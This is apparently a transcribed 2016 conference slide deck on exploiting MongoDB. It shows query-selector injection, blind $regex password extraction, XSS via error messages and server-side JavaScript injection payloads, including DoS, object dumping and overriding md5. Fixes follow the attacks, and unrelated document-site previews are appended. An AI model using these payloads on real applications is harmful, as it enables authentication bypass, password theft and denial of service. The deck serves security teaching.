NoSQL: NoInjections or NoSecurity
|
|
- Opal Stephens
- 6 years ago
- Views:
Transcription
1 NoSQL: NoInjections or NoSecurity A Guide to MongoDB Exploitation Stark Riedesel Oct 2016
2 What is Document Database (NoSQL) Documents = JSON Schema-free Nested documents (No JOINs) BSON for efficiency Complex Query Language Create/Read/Update/Delete (CRUD) Data Aggregation (sum/average/group by/etc.) Full Text Search Map/Reduce (BigData) JavaScript Query Environment database code execution :)
3 Why (Most) Popular NoSQL database Open source (as of 2009) Easy to get started No tables or columns No data types Just plain JSON objects MEAN stack Easy to setup and use Not always a good thing Source:
4 Stack MongoDB Database/JSON store Express.JS Web server Angular.JS Client-side app code Node.JS Server-side app code Full-Stack JavaScript JavaScript everywhere JSON everywhere Minimal data-conversions Often: API-based apps
5 Out of the Box Insecurity By default: No authentication No access control No encryption At rest Or in transit Never, ever, expose to the internet
6 Out of the Box Insecurity By default: No authentication No access control No encryption Source: At rest Or in transit Never, ever, expose to the internet Source: Source:
7 Out of the Box Insecurity Source:
8 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection?
9 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection? Mongo says no:
10 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection? Mongo says no: But
11 Query Selectors Typical query might look like: Product.find({ id: req.query.product_id})
12 Query Selectors Just JSON! Typical query might look like: Product.find({ id: req.query.product_id}) More complex query might look like: Product.find({ price: { $lt: req.query.price}}) Operators include: $lt $gt $eq $ne $regex (and many more)
13 Query Selector Injection Query to Inject: User.find({ username: req.query.username, password: req.query.password})
14 Query Selector Injection Query to Inject: Injection: User.find({ username: req.query.username, password: req.query.password}) Resulting Query: User.find({ username: admin, password: {$ne: }})
15 Demo Time (v1) Demonstration of Query Injections
16 Password Extraction By using the $regex operator, we can extract passwords: password[$regex]=^a 401 Unauthorized password[$regex]=^b 401 Unauthorized password[$regex]=^c 401 Unauthorized password[$regex]=^d 401 Unauthorized password[$regex]=^e 401 Unauthorized password[$regex]=^f 200 OK password[$regex]=^fa 401 Unauthorized password[$regex]=^fb 401 Unauthorized password[$regex]=^fc 401 Unauthorized password[$regex]=^fo 200 OK password[$regex]=^foo$ 200 OK
17 Bonus: XSS Vector Displaying MongoDB error messages is BAD User.findOne({ username: req.query.username, password: req.query.password}, function(error, user) { if (error) return res.send(error); else return res.send( Logged in as: +user.username); }});
18 Bonus: XSS Vector Injection: password[$<script>alert( XSS );</script>]=
19 Demo Time (v2) Advanced Query Injections
20 Only You Can Prevent Query Selector Injections Validate/Sanitize your inputs. I know you know but do your developers know? But I thought ORMs prevent Injections MEAN is young (Almost) no libraries do this by default User.findOne({ username: String(req.query.username), password: String(req.query.password)});
21 Advanced MongoDB Exploitation Time for some good old JavaScript RCE
22 Server Side JavaScript (SSJS) Execution Executed in the context of the Mongo server Operator: $where Customer.find({ $where: this.credits == this.debits }) User.find({ $where: this.password == MD5( +req.query.password+ ) }) Aggregations Group (aka GROUP BY) Used to create custom aggregations Map/Reduce (aka BigData) Used to perform complex logic server-side
23 SSJS Injection User-supplied data -> JavaScript function -> RCE Same issue as traditional SQL injection User.find({ $where: this.password == MD5( +req.query.password+ ) }) Arbitrary JS code, but sandboxed (versions >2.4) Cannot write/modify data Cannot access global db object Cannot access other collections
24 Anatomy of a SSJS Injection ;return 1==1;}// - Roughly equivalent to SQLi: OR 1=1 ;return this.username== admin ;}// ;while(1);return 1==1;}// ;sleep(1000);return 1==1;}// ;assert(false,tojson(this));return 1==1;}//
25 The Global Namespace Source: Documentation: 31 functions vs Reality: ~100 functions/properties Interesting: Able to read recent JavaScript clauses via the _funcs# properties Scary: Able to modify JS built-in functions var global = Function('return this')(); printjson(object.getownpropertynames(global));
26 SSJS Injection Attack Patterns Error injection (dump objects) assert(false, tojson(this)) Error injection (XSS) DoS assert(false, <script>alert( xss );</script> ) while(1); Blind Injections if(str[0]== a ){sleep(100);}
27 Advanced SSJS Injection Attack Patterns Taint the global namespace: var global = Function('return this')(); global.date=function(){ assert(false,tojson(eval( obj ))); }; return 1=1;}// Disrupt security functionality var global = Function('return this')(); global.md5=function(x){ return x; }; return 1=1;}// Dump recent code execution var global = Function('return this')(); assert(false,tojson(global._funcs1)); return 1=1;}//
28 Demo Time (v3) This time with more code execution!
29 Preventing SSJS Injection Disable scripting entirely: --noscripting Just don t have user input in JS code Validate Validate Validate Scoped Variables????
30 Preventing SSJS Injection Disable scripting entirely: --noscripting Just don t have user input in JS code Validate Validate Validate Scoped Variables???? Yes, but no major ORM supports this yet var bson = require('bson'); var ssjs = new bson.code( (this.credits - this.debits) > amount", {amount: req.query.amount} ); mycollection.find( { $where: ssjs} );
31 State of MongoDB Most deployments don t do network stuff right Apps/Libraries haven t learned lessons from SQL injection Web frameworks assist us build query objects JavaScript injection is scary
32 State of MongoDB Most deployments don t do network stuff right Security Testing Tools Apps/Libraries haven t learned lessons from SQL injection Web frameworks assist us build query objects JavaScript injection is scary Burp Suite: Good SSJS detection NoSQLMap: Outdated/Limited for SSJS; good for network stuff Pretty much nothing scans for query selector injection
NoSQL Injection SEC642. Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques S
SEC642 Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques S NoSQL Injection Copyright 2012-2018 Justin Searle and Adrien de Beaupré All Rights Reserved Version D01_01 About
More informationSecurity. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
More informationMaking MongoDB Accessible to All. Brody Messmer Product Owner DataDirect On-Premise Drivers Progress Software
Making MongoDB Accessible to All Brody Messmer Product Owner DataDirect On-Premise Drivers Progress Software Agenda Intro to MongoDB What is MongoDB? Benefits Challenges and Common Criticisms Schema Design
More informationMongoDB. CSC309 TA: Sukwon Oh
MongoDB CSC309 TA: Sukwon Oh Review SQL declarative language for querying data tells what to find and not how to find Review RDBMS Characteristics Easy to use Complicated to use it right Fixed schema Difficult
More informationBackend IV: Authentication, Authorization and Sanitization. Tuesday, January 13, 15
6.148 Backend IV: Authentication, Authorization and Sanitization The Internet is a scary place Security is a big deal! TODAY What is security? How will we try to break your site? Authentication,
More informationCourse Content MongoDB
Course Content MongoDB 1. Course introduction and mongodb Essentials (basics) 2. Introduction to NoSQL databases What is NoSQL? Why NoSQL? Difference Between RDBMS and NoSQL Databases Benefits of NoSQL
More informationMEAN Stack. 1. Introduction. 2. Foundation a. The Node.js framework b. Installing Node.js c. Using Node.js to execute scripts
MEAN Stack 1. Introduction 2. Foundation a. The Node.js framework b. Installing Node.js c. Using Node.js to execute scripts 3. Node Projects a. The Node Package Manager b. Creating a project c. The package.json
More informationReview. Fundamentals of Website Development. Web Extensions Server side & Where is your JOB? The Department of Computer Science 11/30/2015
Fundamentals of Website Development CSC 2320, Fall 2015 The Department of Computer Science Review Web Extensions Server side & Where is your JOB? 1 In this chapter Dynamic pages programming Database Others
More informationDocument Object Storage with MongoDB
Document Object Storage with MongoDB Lecture BigData Analytics Julian M. Kunkel julian.kunkel@googlemail.com University of Hamburg / German Climate Computing Center (DKRZ) 2017-12-15 Disclaimer: Big Data
More informationDatabases/JQuery AUGUST 1, 2018
Databases/JQuery AUGUST 1, 2018 Databases What is a Database? A table Durable place for storing things Place to easily lookup and update information Databases: The M in MVC What is a Database? Your Model
More informationINJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING
INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING AJIN ABRAHAM SECURITY ENGINEER #WHOAMI Security Engineering @ Research on Runtime Application Self Defence Authored MobSF, Xenotix
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationCSE 530A. Non-Relational Databases. Washington University Fall 2013
CSE 530A Non-Relational Databases Washington University Fall 2013 NoSQL "NoSQL" was originally the name of a specific RDBMS project that did not use a SQL interface Was co-opted years later to refer to
More informationMongoDB Web Architecture
MongoDB Web Architecture MongoDB MongoDB is an open-source, NoSQL database that uses a JSON-like (BSON) document-oriented model. Data is stored in collections (rather than tables). - Uses dynamic schemas
More informationHuman vs Artificial intelligence Battle of Trust
Human vs Artificial intelligence Battle of Trust Hemil Shah Co-CEO & Director Blueinfy Solutions Pvt Ltd About Hemil Shah hemil@blueinjfy.net Position -, Co-CEO & Director at BlueInfy Solutions, - Founder
More informationReal Time Marketing and Sales Data
Real Time Marketing and Sales Data 6/21/2016 Chase West Eric Sheeder Marissa Renfro 1 Table of Contents Introduction... About JumpCloud Product Vision Requirements.. Functional Requirements Non Functional
More informationUnder the hood testing - Code Reviews - - Harshvardhan Parmar
Under the hood testing - Code Reviews - - Harshvardhan Parmar In the news September 2011 A leading bank s Database hacked (SQLi) June 2011 Sony hack exposes consumer passwords (SQLi) April 2011 Sony sites
More informationWeb Application Attacks
Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~
More informationTuesday, January 13, Backend III: Node.js with Databases
6.148 Backend III: Node.js with Databases HELLO AND WELCOME! Your Feels Lecture too fast! Your Feels Lecture too fast! Too many languages Your Feels Lecture too fast! Too many languages Code more in class
More informationThe course modules of MongoDB developer and administrator online certification training:
The course modules of MongoDB developer and administrator online certification training: 1 An Overview of the Course Introduction to the course Table of Contents Course Objectives Course Overview Value
More informationMongoDB Schema Design for. David Murphy MongoDB Practice Manager - Percona
MongoDB Schema Design for the Click "Dynamic to edit Master Schema" title World style David Murphy MongoDB Practice Manager - Percona Who is this Person and What Does He Know? Former MongoDB Master Former
More informationC1: Define Security Requirements
OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More informationOWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati
OWASP TOP 10 2017 Release Andy Willingham June 12, 2018 OWASP Cincinnati Agenda A quick history lesson The Top 10(s) Web Mobile Privacy Protective Controls Why have a Top 10? Software runs the world (infrastructure,
More informationQuery Languages for Document Stores
Query Languages for Document Stores NoSQL matters conference 2013-04-26 Jan Steemann me I'm a software developer working at triagens GmbH on and with Documents Documents documents are self-contained, aggregate
More informationBig Data Hadoop Developer Course Content. Big Data Hadoop Developer - The Complete Course Course Duration: 45 Hours
Big Data Hadoop Developer Course Content Who is the target audience? Big Data Hadoop Developer - The Complete Course Course Duration: 45 Hours Complete beginners who want to learn Big Data Hadoop Professionals
More informationOnline Multimedia Winter semester 2015/16
Multimedia im Netz Online Multimedia Winter semester 2015/16 Tutorial 09 Major Subject Ludwig-Maximilians-Universität München Online Multimedia WS 2015/16 - Tutorial 09-1 Today s Agenda Discussion: Intellectual
More informationa Very Short Introduction to AngularJS
a Very Short Introduction to AngularJS Lecture 11 CGS 3066 Fall 2016 November 8, 2016 Frameworks Advanced JavaScript programming (especially the complex handling of browser differences), can often be very
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationGroup13: Siddhant Deshmukh, Sudeep Rege, Sharmila Prakash, Dhanusha Varik
Group13: Siddhant Deshmukh, Sudeep Rege, Sharmila Prakash, Dhanusha Varik mongodb (humongous) Introduction What is MongoDB? Why MongoDB? MongoDB Terminology Why Not MongoDB? What is MongoDB? DOCUMENT STORE
More informationOnline. Course Packet PYTHON MEAN.NET
Online Course Packet PYTHON MEAN.NET Last updated on Nov 20, 2017 TABLE OF CONTENTS 2 ONLINE BOOTCAMP What is a Full Stack? 3 Why Become a Full Stack Developer? 4 Program Overview & Prerequisites 5 Schedule
More informationHolistic Database Security
Holistic Database Security 1 Important Terms Exploit: Take advantage of a flaw or feature Attack Surface: Any node on the network that can be attacked. That can be the UI, People, anything that touches
More informationProtect your apps and your customers against application layer attacks
Protect your apps and your customers against application layer attacks Development 1 IT Operations VULNERABILITY DETECTION Bots, hackers, and other bad actors will find and exploit vulnerabilities in web
More informationDreamFactory Security Guide
DreamFactory Security Guide This white paper is designed to provide security information about DreamFactory. The sections below discuss the inherently secure characteristics of the platform and the explicit
More informationMongoDB w/ Some Node.JS Sprinkles
MongoDB w/ Some Node.JS Sprinkles Niall O'Higgins Author MongoDB and Python O'Reilly @niallohiggins on Twitter niallo@beyondfog.com MongoDB Overview Non-relational (NoSQL) document-oriented database Rich
More informationAdvanced Database Project: Document Stores and MongoDB
Advanced Database Project: Document Stores and MongoDB Sivaporn Homvanish (0472422) Tzu-Man Wu (0475596) Table of contents Background 3 Introduction of Database Management System 3 SQL vs NoSQL 3 Document
More informationMongoDB Step By Step. By B.A.Khivsara Assistant Professor Department of Computer Engineering SNJB s COE,Chandwad
MongoDB Step By Step By B.A.Khivsara Assistant Professor Department of Computer Engineering SNJB s COE,Chandwad Outline Introduction to MongoDB Installation in Ubuntu Starting MongoDB in Ubuntu Basic Operations
More informationSimple AngularJS thanks to Best Practices
Simple AngularJS thanks to Best Practices Learn AngularJS the easy way Level 100-300 What s this session about? 1. AngularJS can be easy when you understand basic concepts and best practices 2. But it
More informationThe OWASP Foundation
Application Bug Chaining July 2009 Mark Piper User Catalyst IT Ltd. markp@catalyst.net.nz Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationFull Stack Web Developer
Full Stack Web Developer S.NO Technologies 1 HTML5 &CSS3 2 JavaScript, Object Oriented JavaScript& jquery 3 PHP&MYSQL Objective: Understand the importance of the web as a medium of communication. Understand
More informationCIS 601 Graduate Seminar. Dr. Sunnie S. Chung Dhruv Patel ( ) Kalpesh Sharma ( )
Guide: CIS 601 Graduate Seminar Presented By: Dr. Sunnie S. Chung Dhruv Patel (2652790) Kalpesh Sharma (2660576) Introduction Background Parallel Data Warehouse (PDW) Hive MongoDB Client-side Shared SQL
More informationDownload Studio 3T from
Download Studio 3T from https://studio3t.com/download/ Request a student license from the company. Expect email with a license key from the company. Start up Studio 3T. In Studio 3T go to Help > License
More informationMySQL Document Store. How to replace a NoSQL database by MySQL without effort but with a lot of gains?
1 / 71 2 / 71 3 / 71 MySQL Document Store How to replace a NoSQL database by MySQL without effort but with a lot of gains? Percona University, Ghent, Belgium June 2017 Frédéric Descamps - MySQL Community
More informationCSE 127 Computer Security
CSE 127 Computer Security Fall 2015 Web Security I: SQL injection Stefan Savage The Web creates new problems Web sites are programs Partially implemented in browser» Javascript, Java, Flash Partially implemented
More informationMySQL as a Document Store. Ted Wennmark
MySQL as a Document Store Ted Wennmark ted.wennmark@oracle.com Safe Harbor Statement The following is intended to outline our general product direction. It is intended for information purposes only, and
More informationApplication Layer Security
Application Layer Security General overview Ma. Angel Marquez Andrade Benefits of web Applications: No need to distribute separate client software Changes to the interface take effect immediately Client-side
More informationProtect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013
Protect Your Application with Secure Coding Practices Barrie Dempster & Jason Foy JAM306 February 6, 2013 BlackBerry Security Team Approximately 120 people work within the BlackBerry Security Team Security
More informationMASTERS COURSE IN FULL STACK WEB APPLICATION DEVELOPMENT W W W. W E B S T A C K A C A D E M Y. C O M
MASTERS COURSE IN FULL STACK WEB APPLICATION DEVELOPMENT W W W. W E B S T A C K A C A D E M Y. C O M COURSE OBJECTIVES Enable participants to develop a complete web application from the scratch that includes
More informationDon t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel
Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime
More informationPHP WITH ANGULAR CURRICULUM. What you will Be Able to Achieve During This Course
PHP WITH ANGULAR CURRICULUM What you will Be Able to Achieve During This Course This course will enable you to build real-world, dynamic web sites. If you've built websites using plain HTML, you realize
More informationOpen Source Library Developer & IT Pro
Open Source Library Developer & IT Pro Databases LEV 5 00:00:00 NoSQL/MongoDB: Buildout to Going Live INT 5 02:15:11 NoSQL/MongoDB: Implementation of AngularJS INT 2 00:59:55 NoSQL: What is NoSQL INT 4
More information3 / 120. MySQL 8.0. Frédéric Descamps - MySQL Community Manager - Oracle
1 / 120 2 / 120 3 / 120 MySQL 8.0 a Document Store with all the benefits of a transactional RDBMS Frédéric Descamps - MySQL Community Manager - Oracle 4 / 120 Save the date! 5 / 120 Safe Harbor Statement
More informationNode Js Mongodb And Angularjs Webydo
We have made it easy for you to find a PDF Ebooks without any digging. And by having access to our ebooks online or by storing it on your computer, you have convenient answers with node js mongodb and
More informationCS193X: Web Programming Fundamentals
CS193X: Web Programming Fundamentals Spring 2017 Victoria Kirst (vrk@stanford.edu) CS193X schedule Today - Middleware and Routes - Single-page web app - More MongoDB examples - Authentication - Victoria
More informationMaximizing the speed of time based SQL injection data retrieval
Maximizing the speed of time based SQL injection data retrieval 30c3, Hamburg, 29.12.2013 Arnim' ; DROP TABLE students;-- ) Introduction SQL injection SQLi is #1 of OWASP Top 10 Web vulnerabilities Sample
More informationAndrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West
Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.
1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationCSE 344 Final Review. August 16 th
CSE 344 Final Review August 16 th Final In class on Friday One sheet of notes, front and back cost formulas also provided Practice exam on web site Good luck! Primary Topics Parallel DBs parallel join
More informationANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation
ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP
More informationFortify Software Security Content 2017 Update 4 December 15, 2017
Software Security Research Release Announcement Micro Focus Security Fortify Software Security Content 2017 Update 4 December 15, 2017 About Micro Focus Security Fortify SSR The Software Security Research
More informationIsomorphic Kotlin. Troy
Isomorphic Kotlin Troy Miles @therockncoder Troy Miles @therockncoder Troy Miles, aka the Rockncoder, began writing computer games in assembly language for early computers like the Apple II, Commodore
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationSecurity Course. WebGoat Lab sessions
Security Course WebGoat Lab sessions WebGoat Lab sessions overview Initial Setup Tamper Data Web Goat Lab Session 4 Access Control, session information stealing Lab Session 2 HTTP Basics Sniffing Parameter
More informationSOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications
Enabling and Securing Digital Business in Economy Protect s Serving Business Critical Applications 40 percent of the world s web applications will use an interface Most enterprises today rely on customers
More informationITG Software Engineering
Introduction to MongoDB Course ID: Page 1 Last Updated 12/15/2014 MongoDB for Developers Course Overview: In this 3 day class students will start by learning how to install and configure MongoDB on a Mac
More informationInformix NoSQL-SQL-Crossover
Informix NoSQL-SQL-Crossover Mongo, Json, REST, and your existing data Sprecher andreas.legner@de.ibm.com Agenda Informix as a Json Document Store NoSQL extending SQL SQL and other Informix technologies
More informationFront End Programming
Front End Programming Mendel Rosenblum Brief history of Web Applications Initially: static HTML files only. Common Gateway Interface (CGI) Certain URLs map to executable programs that generate web page
More informationOWASP Top 10 The Ten Most Critical Web Application Security Risks
OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain
More informationeb Security Software Studio
eb Security Software Studio yslin@datalab 1 OWASP Top 10 Security Risks in 2017 Rank Name 1 Injection 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control
More informationMongoDB Tutorial for Beginners
MongoDB Tutorial for Beginners Mongodb is a document-oriented NoSQL database used for high volume data storage. In this tutorial you will learn how Mongodb can be accessed and some of its important features
More informationIntro to MongoDB. Alex Sharp.
Intro to MongoDB Alex Sharp twitter: @ajsharp email: ajsharp@frothlogic.com So what is MongoDB? First and foremost... IT S THE NEW HOTNESS!!! omgomgomg SHINY OBJECTS omgomgomg MongoDB (from "humongous")
More informationTo Kill a Monolith: Slaying the Demons of a Monolith with Node.js Microservices on CloudFoundry. Tony Erwin,
To Kill a Monolith: Slaying the Demons of a Monolith with Node.js Microservices on CloudFoundry Tony Erwin, aerwin@us.ibm.com Agenda Origins of the Bluemix UI Demons of the Monolith Slaying Demons with
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationThe power of PostgreSQL exposed with automatically generated API endpoints. Sylvain Verly Coderbunker 2016Postgres 中国用户大会 Postgres Conference China 20
The power of PostgreSQL exposed with automatically generated API endpoints. Sylvain Verly Coderbunker Development actors Frontend developer Backend developer Database administrator System administrator
More informationWindows Azure Mobile Services
Deliver Solutions, Deliver Careers, Deliver Results Windows Azure Mobile Services September 13, 2013 Today s Speaker @justintspradlin http://www.linkedin.com/in/justintspradlin Agenda Windows Azure Mobile
More informationEnhancing a text collection with a document-oriented database model
Enhancing a text collection with a document-oriented database model a Toolbox based example Andrew Margetts, Monash University Saliba-Logea Documentation Project Data stored in structured format: spreadsheet
More informationSimplified CICD with Jenkins and Git on the ZeroStack Platform
DATA SHEET Simplified CICD with Jenkins and Git on the ZeroStack Platform In the technical article we will walk through an end to end workflow of starting from virtually nothing and establishing a CICD
More informationSecuring ArcGIS Services
Federal GIS Conference 2014 February 10 11, 2014 Washington DC Securing ArcGIS Services James Cardona Agenda Security in the context of ArcGIS for Server Background concepts Access Securing web services
More informationWEB SECURITY p.1
WEB SECURITY 101 - p.1 spritzers - CTF team spritz.math.unipd.it/spritzers.html Disclaimer All information presented here has the only purpose to teach how vulnerabilities work. Use them to win CTFs and
More informationCapabilities of Cloudant NoSQL Database IBM Corporation
Capabilities of Cloudant NoSQL Database After you complete this section, you should understand: The features of the Cloudant NoSQL Database: HTTP RESTfulAPI Secondary indexes and MapReduce Cloudant Query
More informationUsing Node-RED to build the internet of things
IBM Bluemix Using Node-RED to build the internet of things Ever had one of those days Where the Application works! And then Can we also get some data from the this whatchamacallit? And send the logs off
More informationWeb Security. Thierry Sans
Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web
More informationProfound.js. Future of open source development on IBM i. Alex Roytman Profound Logic
Profound.js Future of open source development on IBM i Alex Roytman Profound Logic What is Node.js? The most exciting technology ever to be brought over to IBM i Brings the platform forward in a way like
More informationEmbedded Management Interfaces
Stanford Computer Security Lab Embedded Management Interfaces Emerging Massive Insecurity Stanford Computer Security Lab What this talk is about? What this talk is about? Massively deployed devices What
More informationwelcome to BOILERCAMP HOW TO WEB DEV
welcome to BOILERCAMP HOW TO WEB DEV Introduction / Project Overview The Plan Personal Website/Blog Schedule Introduction / Project Overview HTML / CSS Client-side JavaScript Lunch Node.js / Express.js
More informationTopic 12: Connecting Express and Mongo
Topic 12: Connecting Express and Mongo CITS3403 Agile Web Development Getting MEAN with Mongo, Express, Angular and Node, Chapter 5 and 6 Semester 1, 2018 Node and Mongo There are several ways to connect
More informationA Journey to DynamoDB
A Journey to DynamoDB and maybe away from DynamoDB Adam Dockter VP of Engineering ServiceTarget Who are we? Small Company 4 Developers AWS Infrastructure NO QA!! About our product Self service web application
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationServerless and APIs: Rethinking Curriculum in Higher Education. Munir Mandviwalla and Jeremy Shafer Temple University
Serverless and APIs: Rethinking Curriculum in Higher Education Munir Mandviwalla and Jeremy Shafer Temple University Serverless Serverless computing refers to the concept of building and running applications
More informationHacking Oracle APEX. Welcome. About
Hacking Oracle APEX!2 About Me Welcome scott@sumnertech.com @sspendol!3!4 About Sumner Technologies Originally Established 2005 Relaunched in 2015 Focused exclusively on Oracle APEX solutions Provide wide
More informationApplication Design and Development: October 30
M149: Database Systems Winter 2018 Lecturer: Panagiotis Liakos Application Design and Development: October 30 1 Applications Programs and User Interfaces very few people use a query language to interact
More information1
1 2 3 6 7 8 9 10 Storage & IO Benchmarking Primer Running sysbench and preparing data Use the prepare option to generate the data. Experiments Run sysbench with different storage systems and instance
More informationStoring Tweets. Pickling, MongoDB. Connecting to MySQL through Python
Storing Tweets Pickling, MongoDB Connecting to MySQL through Python Outline Storing or Streaming Simple Storage: Pickling in Python Intro to Mongo DB Connecting and using MySQL Processing pipeline Collect
More informationApplications. Cloud. See voting example (DC Internet voting pilot) Select * from userinfo WHERE id = %%% (variable)
Software Security Requirements General Methodologies Hardware Firmware Software Protocols Procedure s Applications OS Cloud Attack Trees is one of the inside requirement 1. Attacks 2. Evaluation 3. Mitigation
More informationSecure RESTful Web Services to Mobilize Powerful Website Penetration Testing Tools
Secure RESTful Web Services to Mobilize Powerful Website Penetration Testing Tools Problem statement Powerful penetration testing cyber security tools and techniques are freely available via OS based distributions.
More informationWeb Security. Luke Anderson. 26 th May University Of Sydney.
Web Security Luke Anderson luke@lukeanderson.com.au 26 th May 2017 University Of Sydney Overview 1. Introduction 2. SQL Injection 3. XSS 4. SAMY is my Hero! 5. CSRF 6. SSLStrip 7. Insecure Frameworks and
More informationidealab online platform
idealab online platform CONTENT OF THIS PRESENTATION About the team Platform goals Platform specification / behind the picture Platform walkthrough - Overview Platform walkthrough - Login and Registration
More information